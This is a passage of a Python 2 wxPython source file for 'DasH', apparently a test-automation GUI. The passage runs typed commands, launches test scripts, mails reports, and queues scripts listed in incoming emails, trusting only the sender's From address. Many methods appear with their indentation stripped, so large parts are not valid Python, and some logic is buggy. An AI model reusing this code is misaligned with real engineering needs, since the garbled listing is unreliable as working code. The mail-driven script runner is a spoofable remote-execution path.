        # swapped for the script's own log_path variable and not_call_open is
        # flipped so the generated script really opens the session.
        self.add_cmd_to_sequence_queue('DUT["{}"] = dut.dut(name= "{}", **{})'.format(new_page.name,new_page.name,args_str.replace("'a_fake_log_path_for_auto_script'",'log_path').replace("'not_call_open': True,", "'not_call_open': False,") ), 'dut')
        #session = dut(name, **attributes)
    @gui_event_decorator.gui_even_handle
    def on_command_enter(self, event):
        """Parse and run the command line(s) typed into the command box.

        Each line is expected as `module.function args...` or
        `module.class.function args...`; the resolved callable is executed in
        its own thread so the GUI stays responsive.
        """
        info('called on_command_enter')
        cmd = self.m_command_box.GetValue()
        self.m_command_box.Clear()
        cmd = cmd.strip()
        cmds = cmd.replace('\r\n', '\n').split('\n')
        def handle_one_cmd(cmd):
            # Parse and dispatch one command line.
            if cmd.strip()=='':
                return
            cmd_string = cmd.strip()
            # shlex keeps double-quoted arguments together.
            lex = shlex.shlex(cmd_string)
            lex.quotes = '"'
            lex.whitespace_split = True
            cmd_list=list(lex)
            function_obj_name = cmd_list[0]
            # Only names registered by build_function_tab are callable.
            if self.dict_function_obj.has_key(function_obj_name):
                call_function = self.dict_function_obj[function_obj_name]
            else:
                return
            module,class_name, function,args = parse_command_line(cmd)
            self.add_cmd_to_history(cmd, module, None, class_name)
            #args[0]=self.sessions_alive['test_ssh'].session
            if module !='' or class_name!='' or function!='':
                # Arguments naming a known session are rewritten to their
                # DUT["..."] lookup so the generated code can resolve them.
                after_sub_args=[]
                for i in range(len(args)):
                    a = args[i]
                    if a in globals():
                        after_sub_args.append(a)
                    elif a in DUT:
                        after_sub_args.append('DUT["{}"]'.format(a))
                    else:
                        after_sub_args.append(a)
                function_name, new_argvs, new_kwargs, str_code = call_function_in_module(module,class_name,function,after_sub_args, globals())
                #call_function = None
                # if  class_name!="":
                #
                #     call_function = getattr(instance_name, function_name)
                #     #(*new_argvs,**new_kwargs)
                # else:
                #     call_function = instance_name#(*new_argvs,**new_kwargs)
                # Run in a worker thread so long calls don't block the GUI.
                th =threading.Thread(target=call_function, args=new_argvs, kwargs=new_kwargs)
                th.start()
                #self.m_command_box.ShowPosition(len(self.m_command_box.GetString())+1)
                # Second history call records the generated code line.
                self.add_cmd_to_history(cmd, module, str_code, class_name)
            else:
                error('"{}" is NOT a valid call in format:\n\tmodule.class.function call or \n\tmodule.function'.format(cmd))
        for cmd in cmds:
            try:
                handle_one_cmd(cmd)
            except:
                error(traceback.format_exc())
        event.Skip()
def add_src_path_to_python_path(self, path):
paths = path.split(';')
old_path = sys.path
for p in paths:
if p in old_path:
info('path {} already in sys.path'.format(p))
else:
abspath = os.path.abspath(p)
if os.path.exists(abspath):
sys.path.insert(0,abspath)
else:
warn('path {} is not existed, ignored to add it into sys.path'.format(p))
    def on_key_down(self, event):
        """Key-down handler for the command box: Tab and Shift+'?' submit the
        current command; every other key propagates normally."""
        #error(event.KeyCode)
        keycode = event.KeyCode
        if keycode ==wx.WXK_TAB:
            self.m_command_box.AppendText('\t')
            self.on_command_enter(event)
        # NOTE(review): wx.PAPER_ENV_INVITE is a paper-size constant whose
        # numeric value is presumably equal to the '/'-key keycode here, so
        # Shift+'/' types '?' and submits -- confirm against wx's constants.
        elif keycode == wx.PAPER_ENV_INVITE and wx.GetKeyState(wx.WXK_SHIFT):
            self.m_command_box.AppendText('?')
            self.on_command_enter(event)
        else:
            event.Skip()
    def on_key_up(self, event):
        """Key-up handler: Up/Down arrows cycle through the command history
        (as a ring); Tab is swallowed, everything else propagates."""
        keycode = event.KeyCode
        increase =False
        if keycode ==wx.WXK_UP:
            pass
        elif keycode ==wx.WXK_DOWN:
            increase =True#
        if keycode in [wx.WXK_UP, wx.WXK_DOWN]:
            # Replace the box content with the next/previous history entry.
            self.m_command_box.Clear()
            self.history_cmd_index, new_command = get_next_in_ring_list(self.history_cmd_index,self.history_cmd,increase=increase)
            self.m_command_box.AppendText(new_command)
        if keycode in [wx.WXK_TAB]:
            pass
        else:
            event.Skip()
def add_cmd_to_history(self, cmd, module_name, str_code, class_name=""):
if str_code is None:
if self.history_cmd==[]:
self.history_cmd.append(cmd)
elif self.history_cmd[-1]==cmd:
pass
else:
self.history_cmd.append(cmd)
self.history_cmd_index= len(self.history_cmd)
else:# str_code is not None:
self.add_cmd_to_sequence_queue(str_code,module_name, class_name )
#self.sequence_queue.put([cmd, datetime.now()])
    def get_description_of_function(self, function_obj):
        """Build a tooltip string for *function_obj*: its signature (taken
        from the source, or reconstructed from the argspec when no source is
        available, e.g. for .pyc-only modules) plus its docstring.

        Returns '' when nothing can be determined (all errors swallowed).
        """
        import inspect
        fundefstr=''
        try:
            try:
                fundef = inspect.getsource(function_obj) # recreate function define for binary distribute
                # Keep only the header, up to the first ':'.
                fundefstr = fundef[:fundef.find(':')]
            except Exception as e:
                # No source: rebuild the signature from the argspec, quoting
                # string default values.
                (args, varargs, keywords, defaults) =inspect.getargspec(function_obj)
                argstring = ''
                largs=len(args)
                ldefaults= len(defaults)
                gaplen = largs-ldefaults
                index =0
                for arg in args:
                    if index <gaplen:
                        argstring+='%s, '%arg
                    else:
                        defvalue = defaults[index-gaplen]
                        if type('')==type(defvalue):
                            defvalue = '"%s"'%defvalue
                        argstring+='%s = %s, '%(arg,str(defvalue))
                    index+=1
                fundefstr ='%s( %s )'%(function_obj.func_name, argstring)
                fundef =fundefstr
            listoffun =fundef.split('\n')
            ret = function_obj.__doc__
            if ret:
                # Append the (re-indented) docstring under the signature.
                fundefstr = fundefstr +'\n '+'\n '.join(ret.split('\n'))
        except Exception as e:
            pass
        return fundefstr
@gui_event_decorator.gui_even_handle
def check_whether_function_file_is_updated(self):
for module_file in self.dict_function_files.keys():
old_modify_time = self.dict_function_files[module_file]
current_modify_time = os.path.getmtime(module_file)
if current_modify_time ==old_modify_time:
continue
else:
self.build_function_tab()
    @gui_event_decorator.gui_even_handle
    def build_function_tab(self):
        """(Re)build the Functions tree: import every module found in
        src_path and list its functions and class methods, registering each
        callable in self.dict_function_obj for command-box dispatch."""
        try:
            # Drop previously created class instances (closing them when they
            # expose close()) so the reload starts from a clean slate.
            instances = self.dict_function_obj['instance'].keys()
            for inst_name in instances:
                inst = self.dict_function_obj['instance'][inst_name]
                #print ('instance ref count',inst_name, sys.getrefcount(inst))
                if 'close' in dir(inst):
                    inst.close()
                del inst
            fun_list = self.dict_function_obj.keys()
            for fun_name in fun_list:
                inst = self.dict_function_obj[fun_name]
                #print ('instance ref count',fun_name, sys.getrefcount(inst))
                del inst
            time.sleep(1)
            #import gc
            #gc.collect()
            self.dict_function_obj={'instance':{}}
            self.dict_function_files= {}
            src_path = os.path.abspath(self.src_path)
            if not os.path.exists(src_path):
                src_path= os.path.abspath(os.path.curdir)
            base_name = os.path.basename(src_path)
            root =self.function_page.AddRoot(base_name)
            item_info = wx.TreeItemData({'name':src_path})
            self.function_page.SetItemData(root, item_info)
            modules = get_folder_item(src_path)
            if modules is None:
                # Folder disappeared: flag the root node in red.
                self.function_page.SetItemText(root, self.function_page.GetItemText(root) + ' Not Exists!!!')
                self.function_page.SetItemTextColour(root, wx.Colour(255, 0, 0))
                return
            for module_file in modules:
                # Prefer the .py over its .pyc twin; skip dunder-named files.
                if module_file.endswith('.pyc'):
                    if module_file[:-1] in modules:
                        continue
                if module_file.startswith('__'):
                    continue
                path_name = '{}'.format(os.path.abspath(self.src_path))
                module_name = os.path.basename(module_file).split('.')[0]
                extension = os.path.basename(module_file).split('.')[-1]
                full_name = '{}/{}'.format(path_name,module_file)
                if extension.lower() in ['py', 'pyc']:
                    try:
                        new_module = self.function_page.InsertItem(root, root, module_name)
                        module_file, path_name, description = imp.find_module(module_name)
                        lmod = imp.load_module(module_name, module_file, path_name,description)
                        # Remember the mtime so later edits trigger a rebuild.
                        self.dict_function_files[full_name] = os.path.getmtime(full_name)
                        for attr in sorted(dir(lmod)):
                            if attr.startswith('__'):
                                continue
                            attr_obj = getattr(lmod, attr)
                            attr_type = type(attr_obj)
                            if attr_type == types.FunctionType :
                                # Plain module-level function.
                                new_item = self.function_page.InsertItem(new_module, new_module, '{}'.format( attr))
                                fun_str = '{}.{}'.format(module_name,attr)
                                item_info = wx.TreeItemData({'name':fun_str,
                                                    'tip':self.get_description_of_function(attr_obj),
                                                    })
                                self.dict_function_obj[fun_str] = attr_obj
                                self.function_page.SetItemData(new_item, item_info)
                            elif attr_type== types.TypeType:
                                # A class: instantiate it once and expose its
                                # public methods as callable entries.
                                #class_obj = getattr(lmod, attr)
                                instance = getattr(lmod, attr)()
                                self.dict_function_obj['instance'][attr]=instance
                                new_class = self.function_page.InsertItem(new_module, new_module, attr)
                                item_info = wx.TreeItemData({'name':'{}.{}'.format(module_name,attr)})
                                self.function_page.SetItemData(new_class, item_info)
                                for attr_in_class in sorted(dir(instance)):
                                    if attr_in_class.startswith('__'):
                                        continue
                                    attr_obj = getattr(instance,attr_in_class)
                                    attr_type =type(attr_obj)
                                    if attr_type == types.MethodType :
                                        fun_str = '{}.{}.{}'.format(module_name,attr,attr_in_class)
                                        item_info = wx.TreeItemData({'name':fun_str,
                                                            'tip':self.get_description_of_function(attr_obj)})
                                        new_item = self.function_page.InsertItem(new_class, new_class, attr_in_class)
                                        self.dict_function_obj[fun_str] = getattr(instance, attr_in_class)#attr_obj
                                        self.function_page.SetItemData(new_item, item_info)
                    except :
                        # NOTE(review): import/instantiation errors for a
                        # module are silently skipped.
                        pass
            self.function_page.Expand(root)
            first_child = self.function_page.GetFirstChild(root)
            self.function_page.Expand(first_child[0])
        except Exception as e:
            print(traceback.format_exc())
    def on_LeftDClick_in_Function_tab(self,event):
        """Copy the double-clicked function's dotted name into the command
        box, ready for the user to append its arguments."""
        event.Skip()
        select_item = self.function_page.GetSelection()
        fun_name = self.function_page.GetItemData(select_item)
        text_in_tree = self.function_page.GetItemText(select_item)
        # Only leaf items (functions/methods) carry a 'name' entry.
        if fun_name != None and fun_name.Data.has_key('name'):
            cmd = fun_name.Data['name']
            info('click item in Functions tab: {}'.format(fun_name.Data['name']))
            # wx.CallAfter keeps the widget updates on the GUI thread.
            wx.CallAfter(self.m_command_box.Clear)
            wx.CallAfter(self.m_command_box.AppendText, cmd+' ')
            wx.CallAfter(self.m_command_box.SetFocus)
            wx.CallAfter(self.m_command_box.SetInsertionPointEnd)
            wx.CallAfter(self.m_command_box.Refresh)
def on_refresh_case_page(self, event):
self.case_suite_page.DeleteAllItems()
self.build_suite_tree()
info('Refresh Case tab done!')
def on_right_down_in_session_tab(self, event):
menu = wx.Menu()
item = wx.MenuItem(menu, wx.NewId(), "Refresh")
#acc = wx.AcceleratorEntry()
#acc.Set(wx.ACCEL_NORMAL, ord('O'), self.popupID1)
#item.SetAccel(acc)
menu.AppendItem(item)
self.Bind(wx.EVT_MENU, self.on_refresh_session_page,item)
self.PopupMenu(menu,event.GetPosition())
def on_refresh_session_page(self, event):
self.session_page.DeleteAllItems()
self.build_session_tab()
info('Refresh Session tab done!')
def on_right_down_in_function_tab(self, event):
menu = wx.Menu()
item = wx.MenuItem(menu, wx.NewId(), "Refresh")
#acc = wx.AcceleratorEntry()
#acc.Set(wx.ACCEL_NORMAL, ord('O'), self.popupID1)
#item.SetAccel(acc)
menu.AppendItem(item)
self.Bind(wx.EVT_MENU, self.on_refresh_function_page,item)
self.PopupMenu(menu,event.GetPosition())
def on_refresh_function_page(self, event):
self.function_page.DeleteAllItems()
self.build_function_tab()
info('Refresh Function tab done!')
def add_cmd_to_sequence_queue(self, cmd, module_name, class_name=""):
if self.import_modules.has_key(module_name):
pass
else:
self.import_modules.update({module_name:class_name})
self.sequence_queue.put([cmd,datetime.now() ])
    def generate_code(self, file_name ):
        """Drain the recorded command queue into a runnable Python script and
        append it to *file_name* - unless no operation was recorded at all.

        @param file_name: target script path (opened with 'a+').
        """
        #todo 2017-10-21 no code need, when no command entered at all
        # Script preamble: path setup, per-run log folder, DUT table, and the
        # opening `try:` that wraps all replayed commands.
        str_code ="""#created by DasH {}
if __name__ == "__main__":
    import sys, traceback
    sys.path.insert(0,r'{}')
    sys.path.insert(0,r'{}')
    import common
    log_path= '../log/tmp'
    log_path= common.create_case_folder()
    DUT={}
    try:
""".format(datetime.now().isoformat('-'), self.src_path,self.lib_path , "{}")
        sessions =[]
        # Emit imports (and instance construction) for every module that
        # contributed a command.
        for module in self.import_modules:
            str_code+='        import {mod}\n'.format(mod=module)#\n        {mod}_instance = {mod}()
        for module in self.import_modules:
            class_name = self.import_modules[module]
            if class_name!="":
                str_code+='        {mod}_instance = {mod}.{class_name}()\n'.format(mod=module, class_name=class_name)#\
        no_operation = True
        # Drain the queue; each entry is [code line, timestamp].
        while True:
            try:
                cmd, timestamp =self.sequence_queue.get(block=False)[:2]
                str_code +='        {} #{}\n'.format(cmd, timestamp.isoformat( ' '))
                # dut.dut(...) lines create sessions that must be closed at
                # the end of the generated script.
                if cmd.find('dut.dut(')!=-1:
                    sessions.append(cmd.split('=')[0].strip())
                no_operation=False
                #datetime.now().isoformat()
            except Exception as e:
                # Queue empty (Queue.Empty) - stop draining.
                break
        close_session=''
        # Error path: print the traceback, close sessions, exit non-zero.
        str_code+='''    except Exception as e:
        print(traceback.format_exc())\n'''
        for ses in sessions:
            str_code+='''        {}.close_session()\n'''.format(ses)
            no_operation=False
        str_code+='        sys.exit(-1)\n'#, sys.exit(-1)
        # Normal path: close every opened session.
        for ses in sessions:
            str_code+='''        {}.close_session()\n'''.format(ses)
        info('code saved to file: ',file_name)
        info(str_code)
        info('code saved to file: ',file_name)
        if not no_operation:
            with open(file_name, 'a+') as f:
                f.write(str_code)
        else:
            info('No code will be saved to file, due to no operation was performed ',file_name)
def on_right_down_in_case_tab(self, event):
menu = wx.Menu()
item1 = wx.MenuItem(menu, wx.NewId(), "Run Test")
item2 = wx.MenuItem(menu, wx.NewId(), "Kill Test")
item3 = wx.MenuItem(menu, wx.NewId(), "Refresh")
#acc = wx.AcceleratorEntry()
#acc.Set(wx.ACCEL_NORMAL, ord('O'), self.popupID1)
#item.SetAccel(acc)
menu.AppendItem(item1)
menu.AppendItem(item2)
menu.AppendItem(item3)
self.Bind(wx.EVT_MENU, self.on_run_script,item1)
self.Bind(wx.EVT_MENU, self.on_kill_script,item2)
self.Bind(wx.EVT_MENU, self.on_refresh_case_page,item3)
self.PopupMenu(menu,event.GetPosition())
    def on_kill_script(self,event):
        """Context-menu handler: terminate the selected case's process if it
        is still running, otherwise just record its final result."""
        hit_item = self.case_suite_page.GetSelection()
        item_name = self.case_suite_page.GetItemText(hit_item)
        item_data = self.case_suite_page.GetItemData(hit_item).Data
        # Only items that were started via on_run_script carry 'PROCESS'.
        if item_data.has_key('PROCESS'):
            p = item_data['PROCESS']
            name= item_data['FULL_NAME']
            info('script:{}, returncode:{}'.format(name,p.returncode))
            if p.returncode is None:
                #if p.is_alive():
                info('Terminate alive process {}:{}'.format(item_name, p.pid))
                result ='KILL'
                # Record the kill and mail the delta report before actually
                # terminating the process.
                self.update_case_status(p.pid, result)
                self.mail_test_report("DASH TEST REPORT-updating")
                p.terminate()
            else:
                result ='FAIL' if p.returncode else 'PASS'
                info('{}:{} completed with returncode {}'.format(item_name, p.pid, result))
                self.update_case_status(p.pid, result)
    def run_script(self, script_name):
        """Launch one test script in a separate console process.

        @param script_name: script path (resolved against the suite folder if
               it has no path separator) followed by its arguments.
        @return: (subprocess.Popen object, per-case log folder path).
        """
        old_script_name = script_name
        # shlex keeps double-quoted arguments intact while splitting.
        lex = shlex.shlex(script_name)
        lex.quotes = '"'
        lex.whitespace_split = True
        script_name_and_args = list(lex)
        script_args = script_name_and_args[1:]
        script_name = script_name_and_args[0]
        # Bare names are resolved against the test-suite folder.
        if script_name.find(os.path.sep)!=-1:
            pass
        else:
            script_name= '{}/{}'.format(self.suite_path,script_name)
        from lib.common import create_case_folder
        # sys.argv is swapped around the call -- presumably
        # create_case_folder() derives the folder name from argv; confirm.
        old_sys_argv = sys.argv
        sys.argv= [script_name]+script_args
        case_log_path = create_case_folder(self.log_path )#self.log_path #create_case_folder()
        sys.argv= old_sys_argv
        try:
            # Prefer the frozen runner when it is present next to the app.
            if os.path.exists('script_runner.exe'):
                execute = 'script_runner.exe'
                cmd = [execute,script_name ]+script_args + ['-l','{}'.format(case_log_path)]
                #p=subprocess.Popen(cmd, creationflags = subprocess.CREATE_NEW_CONSOLE)
            else:
                cmd = [sys.executable,'./script_runner.py', script_name ]+script_args+ ['-l','{}'.format(case_log_path)]
            p=subprocess.Popen(cmd, creationflags = subprocess.CREATE_NEW_CONSOLE)#, stdin=pipe_input, stdout=pipe_output,stderr=pipe_output)
            self.add_new_case_to_report(p.pid, old_script_name, p, case_log_path)
        except:
            # NOTE(review): if Popen itself raised, `p` is unbound and the
            # return below raises NameError.
            error(traceback.format_exc())
        return p, case_log_path
    def on_run_script(self,event):
        """Context-menu handler: run the selected item - either a whole test
        suite file (.txt/.csv) or a single test case script."""
        hit_item = self.case_suite_page.GetSelection()
        item_name = self.case_suite_page.GetItemText(hit_item)
        item_data = self.case_suite_page.GetItemData(hit_item).Data
        script_name = self.case_suite_page.GetItemData(hit_item).Data['path_name']
        if script_name.lower().split('.')[-1] in ['txt','csv']:#test suite file, not a single script
            self.run_a_test_suite(script_name)
        else:#a single test case
            # Kill any previous run of this item before starting a new one.
            self.on_kill_script(event)
            try:
                p, case_log_path = self.run_script('{} {}'.format(script_name, item_name.replace(os.path.basename(script_name), '')))
                # Remember the process on the tree item so on_kill_script can
                # find it later.
                self.case_suite_page.GetItemData(hit_item).Data['PROCESS']=p
                self.case_suite_page.GetItemData(hit_item).Data['FULL_NAME']= item_name
                info('start process {} :{}'.format(item_name, p.pid))
                #p.join() # this blocks until the process terminates
                time.sleep(1)
            except Exception as e :
                error(traceback.format_exc())
        #p = Process(target=run_script, args=[script_name, script_and_args])
        #p.start()
def check_case_status(self):
self.check_case_running_status_lock.acquire()
changed=False
running_case = 0
for pid in self.dict_test_report.keys():
case_name, start_time, end_time, duration, return_code ,proc, log_path= self.dict_test_report[pid]
if return_code is None:
if proc.poll() is None:
running_case+=1
debug('RUNNING', start_time, end_time, duration, return_code ,proc, log_path)
else:
changed=True
return_code = 'FAIL' if proc.returncode else 'PASS'
self.update_case_status(pid,return_code)
if running_case:
pass
elif not self.case_queue.empty():#self.case_queue.qsize():
case_name_with_args = self.case_queue.get()
p, case_log_path = self.run_script(case_name_with_args)
self.check_case_running_status_lock.release()
if changed:
#test_report = self.generate_report(filename='{}/dash_report.txt'.format(self.log_path))
self.mail_test_report('DasH Test Report-updating')
return changed
    def polling_running_cases(self):
        """Background loop: poll the running cases every 10 s until
        self.alive turns False (set by on_close)."""
        try:
            while self.alive:
                time.sleep(10)
                try:
                    self.check_case_status()
                except:
                    # Only report poll errors while the app is still alive.
                    if self.alive:
                        error(traceback.format_exc())
        except:
            pass
        print('end polling_running_cases')
        time.sleep(0.01)
        #sys.exit(0) #break can't exit the app immediately, so change it to exit
        #self.check_case_running_status_lock.acquire()
        #self.check_case_running_status_lock.release()
def add_new_case_to_report(self, pid, case_name, proc, log_path):
start_time=datetime.now()
duration = 0
end_time = None
return_code = None
#self.check_case_running_status_lock.acquire()
if pid in self.dict_test_report:
self.dict_test_report[pid].update([case_name, start_time, end_time, duration, return_code, proc, log_path])
else:
self.dict_test_report[pid]= [case_name, start_time, end_time, duration, return_code, proc, log_path ]
#self.check_case_running_status_lock.release()
def update_case_status(self, pid,return_code=None):
now = datetime.now()
case_name, start_time, end_time, duration, tmp_return_code ,proc,log_path= self.dict_test_report[pid]
if tmp_return_code is None:
duration = (now-start_time).total_seconds()
if return_code is not None:
end_time=now
self.dict_test_report[pid]=[case_name,start_time, end_time, duration, return_code, proc, log_path]
else:
pass# don't update one case result twice
    def mail_test_report(self, subject="DASH TEST REPORT-updating"):
        """Generate an HTML report and mail it to the configured recipients.

        A subject containing 'updating' sets report_all_cases=False
        (presumably an incremental report -- see generate_report for the
        exact semantics).  Report/mail errors are logged, never raised.
        """
        try:
            #self.check_case_status()
            report_all_cases=True
            if subject.find('updating')!=-1:
                report_all_cases=False
            test_report = self.generate_report(filename='{}/dash_report_{}.html'.format(self.log_path, self.timestamp),report_all_cases= report_all_cases)
            #TO, SUBJECT, TEXT, SERVER, FROM
            send_mail_smtp_without_login(self.mail_to_list, subject,test_report,self.mail_server,self.mail_from)
        except Exception as e:
            error(traceback.format_exc())
def on_mail_test_report(self,event):
self.mail_test_report('DasH Test Report-requested')
#p.terminate()
    def on_handle_request_via_mail(self):
        """Poll the IMAP inbox and execute DasH commands sent by mail.

        Unseen mails from any authorized sender are inspected; the
        (lower-cased) subject selects the action: list support commands,
        dump the case queue / case list, mail a report, kill running
        cases, clear the queue, or queue the scripts listed in the mail
        body.  Handled mails are marked seen by fetching them with
        RFC822; unmatched mails are explicitly flagged back to unseen.
        """
        import imaplib
        from email.parser import Parser
        def process_multipart_message(message):
            # Recursively flatten a (possibly multipart) email payload
            # into one string; plain strings/lists pass through unchanged.
            if isinstance(message, basestring) or isinstance(message , list):
                return message
            rtn = ''
            try:
                if message.is_multipart():
                    for m in message.get_payload():
                        rtn += process_multipart_message(m)
                else:
                    rtn += message.get_payload()
            except Exception as e:
                pass
            return rtn
        url, user, password = self.mail_read_url,self.mail_user, self.mail_password
        # placeholder account means mail support is not configured
        if self.mail_user in ['nonexistent@dash.com']:
            return
        conn = imaplib.IMAP4_SSL(url,993)
        #conn.logout()
        #conn.authenticate('')
        conn.debug = 0#10
        def plain_callback(response):
            # SASL PLAIN: authzid NUL authcid NUL password
            return "{}\x00{}\x00{}".format(user.lower(),user.lower(),password)
        try:
            conn.authenticate('PLAIN',plain_callback)
        except:
            # fall back to a plain LOGIN when PLAIN auth is refused
            conn.login(user,password)
        self.mail_failure = False
        conn.select('INBOX')#, readonly=True)
        try:
            authorized_mail_address = self.mail_to_list.replace(',',';').split(';')
        except Exception as e:
            return
        for mail_address in authorized_mail_address:
            results,data = conn.search(None,'(UNSEEN)', '(FROM "{}")'.format(mail_address)) # #'ALL')
            msg_ids = data[0]
            msg_id_list = msg_ids.split()
            MAX_UNREAD_MAIL = 50
            # newest first, capped so a flooded inbox can't stall the poller
            for unread_mail_id in msg_id_list[::-1][:MAX_UNREAD_MAIL]:
                # PEEK keeps the message unseen until we decide it is handled
                result,data = conn.fetch(unread_mail_id,'(BODY.PEEK[HEADER])')#"(RFC822)")#
                raw_email = data[0][1]
                p = Parser()
                msg = p.parsestr(raw_email)
                #msg = process_multipart_message(msg )
                from1 = msg.get('From')
                sub = '{}'.format(msg.get('Subject'))
                sub = sub.strip().lower()
                support_list='''
###############################
mail subject below is supported:
dash-request-case-queue : request the cases in queue which to be executed
dash-request-case : request cases which are under suite_path
dash-request-report : request a test report by now
dash-request-kill-running : to kill all running test cases
dash-request-clear-queue : to clear/remove all cases which are in case queue
dash-request-run : to run script(s), each line is a script with arguments if it has
--------------------------------
***non-case-sensitive***
###############################
'''
                handled =False
                if sub in ['dash']:
                    send_mail_smtp_without_login(self.mail_to_list, 'DONE-DasH Support List',support_list,self.mail_server,self.mail_from)
                    handled = True
                    #conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
                elif sub in ['dash-request-case-queue']:
                    case_in_queue =self.get_case_queue(None)
                    send_mail_smtp_without_login(self.mail_to_list, 'DONE-DasH:Case In Queue',case_in_queue+support_list,self.mail_server,self.mail_from)
                    #conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
                    handled = True
                elif sub in ['dash-request-case']:
                    cases_string = '\n\t'.join(self.case_list)
                    send_mail_smtp_without_login(self.mail_to_list, 'DONE-DasH:Case List',cases_string+support_list,self.mail_server,self.mail_from)
                    handled = True
                    #conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
                elif sub in ['dash-request-report']:
                    self.mail_test_report('DasH Test Report-requested')
                    #conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
                    handled = True
                elif sub in ['dash-request-kill-running']:
                    killed= self.on_kill_running_case()
                    send_mail_smtp_without_login(self.mail_to_list, 'DONE-[DasH]:Killed Running Case(s)',killed+support_list,self.mail_server,self.mail_from)
                    handled = True
                    #conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
                elif sub in ['dash-request-clear-queue']:
                    case_in_queue = self.on_clear_case_queue()
                    send_mail_smtp_without_login(self.mail_to_list, 'DONE-DasH:Clear Case Queue',case_in_queue+support_list,self.mail_server,self.mail_from)
                    handled = True
                    #conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
                elif sub in ['dash-request-run']:
                    #if from1 in [ 'yu_silence@163.com',self.mail_to_list]:
                    conn.uid('STORE', unread_mail_id, '+FLAGS', r'(\SEEN)')
                    handled = True
                    #conn.uid('STORE', '-FLAGS', '(\Seen)')
                    # each non-empty, non-comment body line is one script
                    # (with optional arguments) to queue
                    payload = msg.get_payload()
                    payload = process_multipart_message(payload )
                    from lib.html2text import html2text
                    txt = html2text(payload)
                    cases = txt.replace('\r\n','\n').split('\n')
                    for line in cases:
                        line = line.strip()
                        if line.strip().startswith('#') or len(line)==0:
                            pass
                        else:
                            #done: replace lines below with a function
                            self.add_line_to_case_queue(line)
                    result,data = conn.fetch(unread_mail_id,'(RFC822)')#"(RFC822)")#
                else:
                    # not a DasH command: push it back to unseen
                    conn.uid('STORE', unread_mail_id, '-FLAGS', r"(\SEEN)")
                #fixed : 2017-09-25 failed to set unmatched mail to unread, to fetch it again with RFC822
                if handled:
                    # full fetch (no PEEK) marks the handled mail as seen
                    result,data = conn.fetch(unread_mail_id,'(RFC822)')#"(RFC822)")#
def check_case_type(self, str_line):
lex = shlex.shlex(str_line)
lex.quotes = '"'
lex.whitespace_split = True
script_name_and_args = list(lex)
script_name = script_name_and_args[0]
return script_name.lower().split('.')[-1],script_name_and_args[0] ,script_name_and_args[1:]
    def polling_request_via_mail(self):
        """Background thread loop: check the mailbox for requests every 5s.

        self.mail_failure mirrors whether the last poll succeeded.  The
        outer bare except only absorbs errors raised while the loop is
        being torn down, so the thread always exits quietly.
        """
        try:
            while self.alive:
                time.sleep(5)
                try:
                    self.on_handle_request_via_mail()
                    self.mail_failure =False
                except Exception as e:
                    self.mail_failure =True
        except :
            pass
        print('end polling_request_via_mail!!!')
        time.sleep(0.01)
def get_case_queue(self, item=None):
case_in_queue = list(self.case_queue.queue)
number_in_queue= len(case_in_queue)
if number_in_queue:
str_case_in_queue='\ntotal {} case(s) in Queue\n'.format(number_in_queue)+'\n'.join('{}'.format(x) for x in case_in_queue)
else:
str_case_in_queue='\nNo Case in Queue'
info('Case(s) in Queue', str_case_in_queue)
return str_case_in_queue
def on_clear_case_queue(self, event=None):
case_in_queue = self.get_case_queue(None)
self.case_queue.queue.clear()
self.get_case_queue(None)
return case_in_queue
def on_kill_running_case(self,event=None):
killed_case= ''
for case in self.dict_test_report:
case_name,start_time, end_time, duration, return_code, proc, log_path = self.dict_test_report[:7]
if return_code is None:
if proc.poll() is None:
killed_case+='{}:{}\n'.format(case_name, proc.pid)
info('Terminate alive process {}:{}'.format(case_name, proc.pid))
result ='KILL'
self.update_case_status(proc.pid, result)
proc.terminate()
info('Killed All Running cases', killed_case)
return killed_case
    def run_a_test_suite(self, csv_file_name, clear_queue=False, kill_running =False):
        """Expand a suite file (csv/txt) into individually queued cases.

        Each row's first column is queued as one case command line after
        argument substitution.  Any failure is logged and swallowed.
        @param csv_file_name: suite file, optionally followed by arguments
        @param clear_queue: drop everything already queued first
        @param kill_running: terminate currently running cases first
        """
        try:
            case_type, suite_file_name, args =self.check_case_type(csv_file_name)
            if clear_queue:
                self.on_clear_case_queue()
            if kill_running:
                self.on_kill_running_case()
            import csv
            if suite_file_name.find(os.path.sep)!=-1:
                pass
            else:
                # bare file name: resolve it relative to the suite directory
                suite_file_name= '{}/{}'.format(self.suite_path,suite_file_name)
            with open(suite_file_name) as bench:
                reader = csv.reader(bench,delimiter=',')
                for row in reader:
                    if len(row)<1:
                        continue
                    else:
                        name = row[0]
                        # NOTE(review): args grows by one leading 0 on every
                        # row, shifting indices between rows -- looks
                        # unintended, confirm before relying on it
                        args.insert(0,0)
                        # NOTE(review): '{{index}}'.format(...) always yields
                        # the literal '{index}' (braces are escaped), so all
                        # placeholders collapse to the same token; probably
                        # '{{{index}}}' was meant -- confirm placeholder syntax
                        for index in range(1,len(args)):
                            name =name.replace('{{index}}'.format(index =index), '{}'.format(args[index]))
                        self.case_queue.put(name)
                        info('adding case to queue: {}'.format(name))
        except Exception as e:
            error(traceback.format_exc())
    def web_server_start(self):
        """Start the embedded DasH web UI (blocking; run on its own thread).

        Serves directory listings for cases/suites/logs/sessions, lets a
        browser trigger case or suite runs via POST, and detects the host
        IP by opening a throwaway UDP socket.  The HTTP server is a
        threading one, stored on self.web_daemon; serve_forever() blocks
        until shutdown.
        """
        from SocketServer import ThreadingMixIn
        from BaseHTTPServer import HTTPServer,BaseHTTPRequestHandler
        import cgi , urllib#StringIO
        class HttpHandler(BaseHTTPRequestHandler):
            # class-level snapshot of the frame's paths and the queue hook,
            # taken once when the server is created
            runner_proc =self.add_line_to_case_queue
            root = os.path.dirname(__file__)+ '/html/'
            home = root
            suite_path = self.suite_path
            log_path = self.log_path
            session_path = self.session_path
            def __del__(self):
                #self.hdrlog.close()
                #print('end http server')
                pass
            def list_dir(self, path, related_path, pattern=['']):
                """Build an HTML directory listing for *path* as a string.

                Returns "" (after sending a 404) when the directory cannot
                be listed.  Files under /case and /suite additionally get
                an argument box and a Run button wired to a POST.
                """
                content =""
                try:
                    list = os.listdir(path)
                except os.error:
                    self.send_error(404, "No permission to list directory")
                    return ""
                list.sort(key=lambda a: a.lower())
                #f = StringIO()
